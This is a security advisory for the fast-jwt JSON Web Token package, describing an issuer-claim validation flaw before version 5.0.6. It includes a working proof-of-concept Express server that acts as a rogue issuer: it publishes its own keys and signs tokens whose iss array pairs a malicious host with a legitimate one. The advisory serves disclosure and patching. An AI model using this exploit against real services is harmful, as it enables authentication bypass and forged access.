Acceptance of Extraneous Untrusted Data With Trusted Data Affecting fast-jwt package, versions <5.0.6

fast-jwt is a Fast JSON Web Token implementation

Affected versions of this package are vulnerable to Acceptance of Extraneous Untrusted Data With Trusted Data when validating an issuer (iss) claim in validateClaimValues(). This function implicitly accepts an array of issuer URLs and accepts it if one member is verified. This behavior is not compliant with RFC 7519, which specifies that a token must be a string. An attacker can bypass the intended verification by sending a JWT whose iss claim includes a malicious domain as well as a legitimate one.

const { generateKeyPairSync } = require('crypto');
const express = require('express');
const pem2jwk = require('pem2jwk');
const jwt = require('jsonwebtoken');

const app = express();
const port = 3001;
const host = `http://localhost:${port}/`;

const { publicKey, privateKey } = generateKeyPairSync("rsa", 
    {   modulusLength: 4096,
        publicKeyEncoding: { type: 'pkcs1', format: 'pem' },
        privateKeyEncoding: { type: 'pkcs1', format: 'pem' },
    },
); 
const jwk = pem2jwk(publicKey);

app.use(express.json());

// Endpoint to create token
app.post('/create-token', (req, res) => {
  const token = jwt.sign({ ...req.body, iss: [host, 'https://valid-iss'],  }, privateKey, { algorithm: 'RS256' });
  res.send(token);
});

app.get('/.well-known/jwks.json', (req, res) => {
    return res.json({
        keys: [{
            ...jwk,
            alg: 'RS256',
            use: 'sig',
        }]
    });
})

app.all('*', (req, res) => {
    return res.json({
        "issuer": host,
        "jwks_uri": host + '.well-known/jwks.json'
    });
});

app.listen(port, () => {
  console.log(`Server is running on port ${port}`);
});

• GitHub Commit
• PoC